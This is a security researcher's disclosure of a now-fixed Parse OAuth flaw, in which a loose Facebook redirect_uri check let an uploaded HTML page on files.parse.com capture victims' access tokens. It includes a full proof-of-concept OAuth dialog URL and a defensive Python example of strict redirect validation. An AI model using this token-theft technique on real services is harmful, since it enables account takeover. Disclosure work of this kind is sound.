In this post I'm going to show how I was able to hack into Parse accounts via an OAuth vulnerability.
You can sign in to Parse by entering your email and password or by signing in with your Facebook account.
If we click the "Log in with Facebook" button, a GET request is sent to this URL:
The parameters that we have to consider are:
So I started to create a forged URL that redirects the victim to a malicious site which saves the Parse token in a file. To do this, I started playing with the redirect_uri parameter to see whether it allows subdomains or subfolders, and this was the result:
- xxx.parse.com (allows redirects to subdomains)
- xxx.parse.com/xxx/ (allows redirects to subfolders)
I noticed that redirect_uri allows subdomains and subfolders, so I looked for an open redirect vulnerability in Parse's domain and subdomains, but I couldn't find anything.
I realized that the Parse subdomain files.parse.com allows me to upload an HTML file, so I uploaded an HTML file containing code that redirects to a malicious URL. The resulting URL to view the page's content was:
Final POC (Facebook has already fixed this issue)
https://www.facebook.com/dialog/oauth?response_type=token&client_id=506576959379594&redirect_uri=http://files.parse.com/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad/68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html&state=3c580f78d588e40668b80dc9b1e310db576cc830e0d02d08&scope=email
This URL will redirect the user to the site which has a script that takes the token and will save it in a file.
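As an added example (not code from the original post or from Parse/Facebook), the following Python models the two redirect_uri policies side by side: the loose "any subdomain, any subfolder" match the post describes, and an exact allowlist match that rejects the uploaded-file host. The registered callback URI is an assumption.

```python
from urllib.parse import urlsplit

# Hypothetical registered callback for the app (the real registration is not
# on the page). Exact-match validation compares against this set only.
REGISTERED_REDIRECT_URIS = {
    "https://www.parse.com/oauth/callback",
}

# The redirect_uri from the post's POC, reused here as the sample input.
POC_REDIRECT_URI = (
    "http://files.parse.com/07c3d9cb-7a00-48c1-81d2-51d1f90bd8ad/"
    "68f9cc54-b661-4448-a4bb-0f413a1bcf8e-wow.html"
)


def loose_redirect_ok(redirect_uri: str) -> bool:
    """Models the weak check the post observed: any host under parse.com is
    accepted, with any path. This is what let files.parse.com through."""
    host = (urlsplit(redirect_uri).hostname or "").lower()
    return host == "parse.com" or host.endswith(".parse.com")


def strict_redirect_ok(redirect_uri: str) -> bool:
    """Exact-match check: scheme, authority and path must equal a registered
    URI. Subdomains, subfolders, http downgrades, userinfo tricks and
    fragments are all rejected because they never produce an exact match."""
    parts = urlsplit(redirect_uri)
    if parts.scheme != "https" or parts.fragment:
        return False
    candidate = f"{parts.scheme}://{parts.netloc.lower()}{parts.path}"
    return candidate in REGISTERED_REDIRECT_URIS


def compare(redirect_uri: str) -> dict:
    """Return both verdicts for one candidate so the difference is visible."""
    return {
        "loose": loose_redirect_ok(redirect_uri),
        "strict": strict_redirect_ok(redirect_uri),
    }


if __name__ == "__main__":
    for uri in (POC_REDIRECT_URI, "https://www.parse.com/oauth/callback"):
        print(uri, compare(uri))
```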